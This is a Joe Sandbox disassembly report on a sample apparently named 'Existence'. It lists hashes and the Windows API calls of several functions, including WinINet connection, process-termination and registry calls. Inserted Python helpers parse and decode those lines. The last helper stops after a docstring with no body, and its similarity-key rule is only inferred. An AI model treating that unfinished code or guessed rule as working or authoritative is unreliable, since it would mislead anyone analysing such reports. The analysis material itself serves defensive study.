Similarity
• API ID: ChangeCloseErrorFindLastNotification__dosmaperr
• String ID: OVw
• API String ID: 490808831-2785480098
• Opcode ID: 361c455979dd0f48f609392e7f57800df4ac58f7a66efcc0aa001284973e024f
• Instruction ID: dca68f6c1d4d6ea8e9e6e17c9d2aa1cf0269069d3d3b4e377b964fdf657db12b
• Opcode Fuzzy Hash: 361c455979dd0f48f609392e7f57800df4ac58f7a66efcc0aa001284973e024f
• Instruction Fuzzy Hash: FF018932605560DACAB062B4EC4AB7E27894B82734F29831AFD178B2C2DF7C8C815582
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,007358BE,SwapMouseButtons,00000004,?), ref: 007358EF
• RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,007358BE,SwapMouseButtons,00000004,?), ref: 00735910
• RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,007358BE,SwapMouseButtons,00000004,?), ref: 00735932
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: 8854709000306fff6b5359a855f51fc3f7aa3dcc69be8099aedf6a7b6ee893a6
• Instruction ID: 2ea35a65e8c7ec01059c6b0afbecf12c4811127260b6f46b6589eecd2b717cdd
• Opcode Fuzzy Hash: 8854709000306fff6b5359a855f51fc3f7aa3dcc69be8099aedf6a7b6ee893a6
• Instruction Fuzzy Hash: 38117CB5510618FFEB21CF68CC80EEEB7B8EF00760F108469F801E7210E235AE419764
Uniqueness

Uniqueness Score: -1.00%

Strings
• Variable must be of type 'Object'., xrefs: 007848C6
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID:
• String ID: Variable must be of type 'Object'.
• API String ID: 0-109567571
• Opcode ID: 544e0314c3c86f8cde652add656881217be59a125f95f91d714224a764e0d991
• Instruction ID: 4c0e557ef6101ab98abcfabda31f38dec8e9ba28fcb7d961301c5e9afb0923a4
• Opcode Fuzzy Hash: 544e0314c3c86f8cde652add656881217be59a125f95f91d714224a764e0d991
• Instruction Fuzzy Hash: 30C2AB71E00609DFEB24DF58C884BADB7B1FF09350F248169E945AB3A2D379AD41CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 00743006
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: CALL$bny
• API String ID: 1385522511-1936831331
• Opcode ID: 993d8131dcb58c75ea8389afe946d39d51ad0388711db714ace6eca7b9176bef
• Instruction ID: c4d2cda18044974bb40bf440b4f8bc4b4a1de04d739ef1dc08079d4427ca00d9
• Opcode Fuzzy Hash: 993d8131dcb58c75ea8389afe946d39d51ad0388711db714ace6eca7b9176bef
• Instruction Fuzzy Hash: C122BE70608201DFC714DF24C884B2ABBF1BF94314F64895DF49A8B3A2D779E956CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
• _wcslen.LIBCMT ref: 007ADB75
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007ADB7F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• API String ID: 596671847-2343686810
• Opcode ID: 65b50a1ce6fa66b26972853ebe5e3606567a1531171475d32635a931cfd4005a
• Instruction ID: 48d489707521bc497c78028708d666f307c89036f71540d45278e99587835446
• Opcode Fuzzy Hash: 65b50a1ce6fa66b26972853ebe5e3606567a1531171475d32635a931cfd4005a
• Instruction Fuzzy Hash: 63317C71801219EFDF55DFA0CC89AEEBFB9FF45314F400029F815A6162EB799A06CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007AD7C2
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007AD7EB
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: ebbc2b711b9598aa71054eefb73da79a5fe99f74280cd99e2817c45ef234f2d0
• Instruction ID: 16002e1ed27258fac5efe7be9d885519f841eb677f3d73bf6fd48772f2b564a7
• Opcode Fuzzy Hash: ebbc2b711b9598aa71054eefb73da79a5fe99f74280cd99e2817c45ef234f2d0
• Instruction Fuzzy Hash: B011C272205232BAD73C4B668C49EF7BE9DEB537A4F10432AB50A92580D6789C40D6F0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 007509D8
  • Part of subcall function 00753614: RaiseException.KERNEL32(?,?,?,007509FA,?,00000000,?,?,?,?,?,?,007509FA,00000000,007F9758,00000000), ref: 00753674
• __CxxThrowException@8.LIBVCRUNTIME ref: 007509F5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Opcode ID: ad3edbca3803e71f5dcef334639ef3d13075610d4414d1b791703e7a973e9d16
• Instruction ID: 014ea1a6c62e1d2b44c4ee14ecce05657651f227b955f7dd61ac7a165abbc89b
• Opcode Fuzzy Hash: ad3edbca3803e71f5dcef334639ef3d13075610d4414d1b791703e7a973e9d16
• Instruction Fuzzy Hash: 75F0C83490070CF78B04BAA8DC5A9EE777C5E00351B604125BE14965A2FBFCE61DCAD1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 007B8D52
• TerminateProcess.KERNEL32(00000000), ref: 007B8D59
• FreeLibrary.KERNEL32(?,?,?,?), ref: 007B8F3A
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• API String ID: 146820519-0
• Opcode ID: b6ac23171acbfda44c193d524dd2f2202748b6e519c8542009fe441f9f1b1c99
• Instruction ID: b0302a64fd0aa0a23c53f333b362f1c47472771bd05bc67e291077500e2a3e60
• Opcode Fuzzy Hash: b6ac23171acbfda44c193d524dd2f2202748b6e519c8542009fe441f9f1b1c99
• Instruction Fuzzy Hash: F3127B71A08341DFD750DF28C484B6ABBE5FF88314F14895DE9898B292CB38E945CB92
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _wcslen$_strcat
• String ID:
• API String ID: 306214811-0
• Opcode ID: 4675c5205c06de3a2400549cdd70bbf39c9f06407390c08c1a1db244e0d312f4
• Instruction ID: 56eee1bb753d699136a206d591f264a29af85c8d2ee2239f6e37090b339066f2
• Opcode Fuzzy Hash: 4675c5205c06de3a2400549cdd70bbf39c9f06407390c08c1a1db244e0d312f4
• Instruction Fuzzy Hash: 91A18D31604605EFCB18DF18C5D5AA9BBF1FF45314B2084ADEA5A8F292DB39ED45CB80
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0073327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007332AF
  • Part of subcall function 0073327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 007332B7
  • Part of subcall function 0073327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007332C2
  • Part of subcall function 0073327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007332CD
  • Part of subcall function 0073327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 007332D5
  • Part of subcall function 0073327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 007332DD
  • Part of subcall function 00733205: RegisterWindowMessageW.USER32(00000004,?,00732964), ref: 0073325D
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00732A0A
• OleInitialize.OLE32 ref: 00732A28
• CloseHandle.KERNEL32(00000000,00000000), ref: 00773A0D
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 1986988660-0
• Opcode ID: ad31c3350704c6c9de7859551a22a4bcbc468a76af40eec4c56b036b0af6de12
• Instruction ID: a9425597cfa270ebbe1f676a442ee391a25e06001cd6b248ca49aa919bff7345
• Opcode Fuzzy Hash: ad31c3350704c6c9de7859551a22a4bcbc468a76af40eec4c56b036b0af6de12
• Instruction Fuzzy Hash: 4B7188B4901601CEE7D8EFA9AD6E6153BE0FB58304750827EA518C72B2EBF845458F58
Uniqueness
• Uniqueness Score: -1.00%

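The API bullets in these entries all follow one fixed shape (`Function.MODULE(args), ref: address`, optionally prefixed with `Part of subcall function ...:`), which makes them easy to triage mechanically rather than by eye. The Python below is an added example written for this page; it is not Joe Sandbox tooling and not code from the analysed sample. It parses that shape into records and decodes two sets of constants that appear above, using values from the public Windows SDK headers: the `InternetSetOptionW` option `0x32` (50) is `INTERNET_OPTION_CONNECTED_STATE` in wininet.h, and the 8-byte buffer length passed with it matches `sizeof(INTERNET_CONNECTED_INFO)`; the `MapVirtualKeyW` first arguments (`0x5B`, `0x10`, `0xA0`, `0xA1`, `0x11`, `0x12`) are `VK_LWIN`, `VK_SHIFT`, `VK_LSHIFT`, `VK_RSHIFT`, `VK_CONTROL` and `VK_MENU` from winuser.h. The sample input is copied from the entries on this page; the trace shows the connected-state buffer contents as `?`, so the state value actually written is not recoverable here and the code only notes that the size is consistent with that structure.

```python
"""Parse Joe Sandbox 'APIs' bullet lines into records and decode a few
well-known constants.  Added example for this page, not Joe Sandbox code.
Sample lines are copied from the report entries above (constructed input)."""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = """\
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007AD7C2
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007AD7EB
• __CxxThrowException@8.LIBVCRUNTIME ref: 007509D8
  • Part of subcall function 00753614: RaiseException.KERNEL32(?,?,?,007509FA,?,00000000), ref: 00753674
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 007B8D52
• TerminateProcess.KERNEL32(00000000), ref: 007B8D59
  • Part of subcall function 0073327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007332AF
  • Part of subcall function 0073327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 007332DD
• OleInitialize.OLE32 ref: 00732A28
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0074FD45
"""

# One bullet: optional subcall prefix, Function.MODULE, optional (args), ref: addr
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[\w@]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constants from the public SDK headers (wininet.h / winuser.h)
INTERNET_OPTIONS = {
    2: "INTERNET_OPTION_CONNECT_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS",
    38: "INTERNET_OPTION_PROXY", 41: "INTERNET_OPTION_USER_AGENT",
    50: "INTERNET_OPTION_CONNECTED_STATE",
}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
                0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}


@dataclass
class ApiCall:
    func: str
    module: str
    args: list                      # int per argument, None where the trace shows '?'
    ref: int                        # call-site address from the report
    subcall_of: Optional[int] = None
    notes: list = field(default_factory=list)


def parse_arg(tok):
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)


def decode(call):
    """Attach human-readable notes for the constants this page exercises."""
    if call.func == "InternetSetOptionW" and len(call.args) >= 4 and call.args[1] is not None:
        call.notes.append("dwOption=" + INTERNET_OPTIONS.get(call.args[1], f"option {call.args[1]}"))
        if call.args[1] == 50 and call.args[3] == 8:
            # 8 == sizeof(INTERNET_CONNECTED_INFO); the buffer contents are not in the trace
            call.notes.append("buffer size matches INTERNET_CONNECTED_INFO")
    elif call.func == "MapVirtualKeyW" and call.args and call.args[0] is not None:
        call.notes.append(VIRTUAL_KEYS.get(call.args[0], f"VK 0x{call.args[0]:02X}"))


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
    call = ApiCall(m["func"], m["mod"], args, int(m["ref"], 16),
                   int(m["sub"], 16) if m["sub"] else None)
    decode(call)
    return call


def parse_report(text):
    return [c for c in (parse_line(l) for l in text.splitlines()) if c]


def modules_used(calls):
    return sorted({c.module for c in calls})


if __name__ == "__main__":
    for c in parse_report(SAMPLE):
        sub = f" (subcall of {c.subcall_of:08X})" if c.subcall_of else ""
        print(f"{c.ref:08X} {c.module}!{c.func}{sub} {' '.join(c.notes)}")
```

Running it over a whole report's API bullets gives a per-function list of modules touched and call sites, which is a quicker way to spot the WinINet, process-termination and tray/hotkey code paths than reading each entry in turn.
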
APIs
  • Part of subcall function 007361A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00736299
• KillTimer.USER32(?,00000001,?,?), ref: 0074FD36
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0074FD45
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0078FE33
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
• API String ID: 3500052701-0
• Opcode ID: eaf156009a14ab70f1889fb6833edc904b2d5e5b6c3f6d266ad5d460f5cddafd
• Instruction ID: df59c7597154fdd6dfe6813e7c1d1fc922ef25689a68ced15649cd2370883bfa
• Opcode Fuzzy Hash: eaf156009a14ab70f1889fb6833edc904b2d5e5b6c3f6d266ad5d460f5cddafd
• Instruction Fuzzy Hash: 9731A771A44744AFEB72DF24C859BE7BBECAF02308F0044AEE6D957242C3785A85CB51
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,007697BA,FF8BC369,00000000,00000002,00000000), ref: 00769744
• GetLastError.KERNEL32(?,007697BA,FF8BC369,00000000,00000002,00000000,?,00765ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00756F41), ref: 0076974E
• __dosmaperr.LIBCMT ref: 00769755
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
• Opcode ID: 7293a7bd31f1667dce69900659ee019c08a3b5d2c6bfaa39a104fc5402dd8cff
• Instruction ID: 7d6e8134574927cafde4c1cd1712f4a28f916b6bf76277ae083c8d63c4b55df8
• Opcode Fuzzy Hash: 7293a7bd31f1667dce69900659ee019c08a3b5d2c6bfaa39a104fc5402dd8cff
• Instruction Fuzzy Hash: 44014C32620514EBCB159F99DC09CAE7B2EEB85330B240219FD1287190EA74DD419B90
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetOpenFileNameW.COMDLG32(?), ref: 0077413B
  • Part of subcall function 00735851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007355D1,?,?,00774B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00735871
  • Part of subcall function 00733A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00733A76
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen
• String ID: X
• API String ID: 779396738-3081909835
• Opcode ID: 8398dd44bfd04528f309f75602a3b49ed4837a270a65bd87344efa0d9c1cdd2e
• Instruction ID: 47c197820e18bc220d96b7c18390adb80e2e4fbc838a0bf74287f4644c6af190
• Opcode Fuzzy Hash: 8398dd44bfd04528f309f75602a3b49ed4837a270a65bd87344efa0d9c1cdd2e
• Instruction Fuzzy Hash: 01218171A002589BDF159F98C809BEE7BF8AF49304F008059E545A7342DBFC9A89CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNEL32 ref: 0075007D
• CreateToolhelp32Snapshot.KERNEL32 ref: 0075008F
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ChangeCloseCreateFindNotificationSnapshotToolhelp32
• String ID:
• API String ID: 4162189087-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 6cb71eb3da873085c138ba43d013636d2ee4fd7ee25d7e14b2194a3e27ff3e10
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: F131D770A00106DFDB18CF58D590AA9F7A5FF49301B6486A5E80DCB292D776EDC5CBC0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 007ADB39: _wcslen.LIBCMT ref: 007ADB75
  • Part of subcall function 007ADB39: InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007ADB7F
• GetLastError.KERNEL32(?,?,?), ref: 007ACE10
• SetEvent.KERNEL32(?), ref: 007ACE24
  • Part of subcall function 007AD81C: InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 007AD844
  • Part of subcall function 007AD81C: InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 007AD86B
  • Part of subcall function 007ACEBB: InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007ACEF5
  • Part of subcall function 007ACEBB: GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 007ACF08
  • Part of subcall function 007ACEBB: SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 007ACF1C
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Internet$ErrorEventLastOptionQuery$ConnectCrack_wcslen
• String ID:
• API String ID: 3507849315-0
• Opcode ID: 6891f1a81dbc8e1b5e847646af850738459994c084f00328b00b4151ca2f7a64
• Instruction ID: 8385457e073c5c2b3f3914c7f237f6634976d4aef60099d20770cd5d761c2a64
• Opcode Fuzzy Hash: 6891f1a81dbc8e1b5e847646af850738459994c084f00328b00b4151ca2f7a64
• Instruction Fuzzy Hash: 8821DAB2A00604FBCF329FB4C8499AF77BCAF96344B10461EF15297512DA3D9948DBA0
Uniqueness

Uniqueness Score: -1.00%
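The Similarity fields in each function block (API ID, Opcode ID, Instruction ID) are the keys Joe Sandbox uses to match a function against functions seen in other samples. Of the three, the API ID is the only one built from the readable API list rather than from the code bytes, so it does not depend on the load address or on the exact instruction encoding, and it can be recomputed from the report text alone. The Python below is an added example, not part of the report and not Joe Sandbox code: it rebuilds the API ID from the six APIs blocks in this section (the five above and the Shell_NotifyIconW block that follows) and compares the result with the printed keys. The construction rule it implements is an assumption inferred from those six keys only: camel-case tokens of every listed API name, subcall entries included, module names and ref addresses ignored, tokens of three characters or fewer dropped, tokens grouped by descending count, groups joined with `$`, byte order inside a group. The numeric API String ID is a separate hash and is not reproduced.

```python
"""Rebuild the Joe Sandbox 'API ID' similarity key from a function's 'APIs' list.

Added example; not part of the report and not Joe Sandbox code. The rule it
implements is inferred from the six API ID values printed in this section
(assumption): tokenize every listed API name on camel-case boundaries, subcall
entries included; ignore the module (KERNEL32, USER32, ...) and the 'ref'
address; drop tokens of three characters or fewer; group tokens by descending
count, join groups with '$', byte-order tokens inside a group.
The numeric 'API String ID' is a different hash and is not reproduced here.
"""
from __future__ import annotations

import re
from collections import Counter

# One "APIs" line as printed in the report, with or without the bullet and the
# "Part of subcall function XXXXXXXX:" prefix; captures API name and module.
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(\w+)\.(\w+)"
)
# A token starts at every uppercase letter; a leading run without uppercase
# letters ("_wcslen", "__dosmaperr") is one token; digits and '_' stay attached.
TOKEN = re.compile(r"^[^A-Z]+|[A-Z][^A-Z]*")
MIN_TOKEN_LEN = 4  # "Get", "Set", "Url", "Ex", "W" never show up in the printed keys


def tokenize(api_name: str) -> list[str]:
    """'Shell_NotifyIconW' -> ['Shell_', 'Notify', 'Icon', 'W']"""
    return TOKEN.findall(api_name)


def api_id(api_lines: list[str]) -> str:
    """Inferred API ID for one function's 'APIs' block; '' if no API line is present."""
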